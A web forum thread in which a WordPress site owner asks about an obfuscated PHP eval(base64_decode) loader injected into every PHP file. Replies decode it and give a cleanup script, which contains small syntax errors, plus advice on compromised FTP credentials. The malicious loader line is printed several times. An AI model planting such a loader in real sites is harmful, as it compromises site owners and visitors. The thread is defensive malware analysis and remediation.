Hacker Php code

[cantstop]

anyone know what this is supposed to do? Some hacker has been placing it in the top of every file ending in php in my blogs and sites?

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2Vuam95YS9wdWJsaWNfaHRtbC9hbm5hbmljb2xlbGVnZW5kL3dwLWluY2x1ZGVzL2pzL3RpbnltY2UvdGhlbWVzL2FkdmFuY2VkL2ltYWdlcy94cC9zdHlsZS5jc3MucGhwJztpZihmaWxlX2V4aXN0cygkR0xPQkFMU1snbWZzbiddKSl7aW5jbHVkZV9vbmNlKCRHTE9CQUxTWydtZnNuJ10pO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJmZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7b2Jfc3RhcnQoJ2Rnb2JoJyk7fX19')); ?>

 

[beaver6813]

anyone know what this is supposed to do? Some hacker has been placing it in the top of every file ending in php in my blogs and sites?

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2Vuam95YS9wdWJsaWNfaHRtbC9hbm5hbmljb2xlbGVnZW5kL3dwLWluY2x1ZGVzL2pzL3RpbnltY2UvdGhlbWVzL2FkdmFuY2VkL2ltYWdlcy94cC9zdHlsZS5jc3MucGhwJztpZihmaWxlX2V4aXN0cygkR0xPQkFMU1snbWZzbiddKSl7aW5jbHVkZV9vbmNlKCRHTE9CQUxTWydtZnNuJ10pO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJmZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7b2Jfc3RhcnQoJ2Rnb2JoJyk7fX19')); ?>

Well it decoded is:

if(function_exists('ob_start')&&!isset($GLOBALS['mfsn']))
{
$GLOBALS['mfsn']='/home/enjoya/public_html/annanicolelegend/wp-includes/js/tinymce/themes/advanced/images/xp/style.css.php';
if(file_exists($GLOBALS['mfsn']))
{
include_once($GLOBALS['mfsn']);
if(function_exists('gml')&&function_exists('dgobh'))
{
ob_start('dgobh');
}
}
}

So it looks as though hes put malicious code in /home/enjoya/public_html/annanicolelegend/wp-includes/js/tinymce/themes/advanced/images/xp/style.css.php. Which I would advise removing straight away (show us what it is before you delete it )
The script looks to see if its included and if not includes it. Then it starts its own output buffering, looks like it wants to steal user stuff.

 

[cantstop]

thank you for

response .i have been removing it but it is quite time consuming as there are 100s of files containing .php in a single wp blog..whoever put these worked cheap because they put the code in every alternate theme as well as every plug in file or does this propagate itself after placed in blog?.I have seen mostly the hacking where 1000s of pharma links are placed in footer but this is placed in every area of the script.I don't get what value user information is from a blog

 

[beaver6813]

response .i have been removing it but it is quite time consuming as there are 100s of files containing .php in a single wp blog..whoever put these worked cheap because they put the code in every alternate theme as well as every plug in file or does this propagate itself after placed in blog?.I have seen mostly the hacking where 1000s of pharma links are placed in footer but this is placed in every area of the script.I don't get what value user information is from a blog

I cant say exactly what it does unless you could tell me whats in wp-includes/js/tinymce/themes/advanced/images/xp/style.css.php. They've got a recursive script that inserts it into the top of every PHP file which theyve presumably run and got rid of.

 

[nasaboy007]

you could always try to run a mass find/replace on that code using software such as dreamweaver or notepad++ which both support find/replace within folders.

also, have you installed any suspicious/uncommon plugins recently that may have vulnerabilites? it seems that you're using wordpress, and as far as i know, wp is decent at security.

also, change all your passwords once you remove all the malicious code just incase the hackers got your password too or something

 

[cantstop]

billy the exterminator

there was no new plugins..if this was just placed in one file and it replicated itself or if someone got a work order "place this code in every file named php" because it is even in all the unused test themes.I wish i knew if there were some files that it could stay in without hurting anything so i can prioritize.nasaboy007 I like that idea i found out by accident that notepad has that feature last month but how would you do that in cpanel? or would you download the files to your pc then edit and reupload.Seems you will still have to open the files one by one that is what takes all the time

 

[beaver6813]

there was no new plugins..if this was just placed in one file and it replicated itself or if someone got a work order "place this code in every file named php" because it is even in all the unused test themes.I wish i knew if there were some files that it could stay in without hurting anything so i can prioritize.nasaboy007 I like that idea i found out by accident that notepad has that feature last month but how would you do that in cpanel? or would you download the files to your pc then edit and reupload.Seems you will still have to open the files one by one that is what takes all the time

I've written you a special script to use, it will do a mass search/replace for the content and will try to delete if its there. If not it'll tell you it couldn't open it for writing but it found nasty stuff there. Basically paste the code below into a file, name it whatever you want ie. cleaner.php, upload to your site into public_html folder and run it from your browser.

NOTE: It may take some time running as its checking every file in your site. Make a backup of anything as is (the script shouldn't muck anything up but as always just incase).

<?php
//Recursive Directory Search and Replace - (Beaver6813) Beaver6813.com
//Adapted from recursive directory listing by hotrungdungit at gmail dot com at php.net
set_time_limit(900);
function SearchandReplace($dir,$stringsearch)
    {
		echo "<strong>Starting search for $stringsearch within directory $dir</strong><br/<br/>";
        $listDir = array();
        if($handler = opendir($dir)) {
            while (($sub = readdir($handler)) !== FALSE) {
                if ($sub != "." && $sub != ".." && $sub != "Thumb.db") {
                    if(is_file($dir."/".$sub)) {
						if(substr_count($sub,'.php'))
							{
							$getfilecontents = file_get_contents($dir."/".$sub);
							if(substr_count($getfilecontents,$stringsearch)>0)
							{
							$replacer = str_replace($stringsearch,'',$getfilecontents);
							// Let's make sure the file exists and is writable first.
							  if (is_writable($dir."/".$sub)) {
								  if (!$handle = fopen($dir."/".$sub, 'w')) {
									   echo "Cannot open file (".$dir."/".$sub.")";
									   exit;
								  }							  
								  // Write $somecontent to our opened file.
								  if (fwrite($handle, $replacer) === FALSE) {
									  echo "Cannot write to file (".$dir."/".$sub.")";
									  exit;
								  }
								  echo "Success, removed searched content from:"$dir."/".$sub."<br/>";
								  fclose($handle);
							  } else {
								  echo "The file ".$dir."/".$sub" is not writable<br/>";
							  }
							}
							}						
                        $listDir[] = $sub;
                    }elseif(is_dir($dir."/".$sub)){
                        $listDir[$sub] = SearchandReplace($dir."/".$sub,$stringsearch);
                    }
                }
            }   
            closedir($handler);
        }
        return $listDir;   
    } 
	
SearchandReplace('/home/enjoya/public_html/',"<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2Vuam95YS9wdWJsaWNfaHRtbC9hbm5hbmljb2xlbGVnZW5kL3dwLWluY2x1ZGVzL2pzL3RpbnltY2UvdGhlbWVzL2FkdmFuY2VkL2ltYWdlcy94cC9zdHlsZS5jc3MucGhwJztpZihmaWxlX2V4aXN0cygkR0xPQkFMU1snbWZzbiddKSl7aW5jbHVkZV9vbmNlKCRHTE9CQUxTWydtZnNuJ10pO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJmZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7b2Jfc3RhcnQoJ2Rnb2JoJyk7fX19')); ?>");
	?>

Good luck! :wave:

 

[nasaboy007]

if you have dreamweaver, you can connect via ftp and do the search/replace remotely (without downloading files). if you have too many files beaver's script may still time out

 

[beaver6813]

if you have dreamweaver, you can connect via ftp and do the search/replace remotely (without downloading files). if you have too many files beaver's script may still time out

Dreamweaver will still have to download each file to check the contents, it will be automated but it'll still have to download and check every file.

 

[qbert220]

Hi,

IMO, it is likely that your FTP username/password has been compromised. I've seen many similar attacks on sites hosted on my servers. You could ask your web host to check their logs to see whether this is indeed the case.

The 2 main causes of the compromising are:

1. Malicious code running on your PC which reads FTP usernames/passwords stored by your FTP software (perhaps in the registry).

2. FTP usernames/passwords are normally sent in the clear. They could have been sniffed if you used an unsecure network connection, such as an unencrypted wireless network.

You should fix the root cause of the problem first. Run a virus scan on all PCs you have connected to your site using FTP with. Use a secure authentication mechanism, as described in Secure FTP

Once you've identified and fixed the root cause, you should restore your site. Since you don't know what has been compromised, I suggest asking your host to delete and recreate your account with a new password, then restore your site from a backup taken before the account was compromised.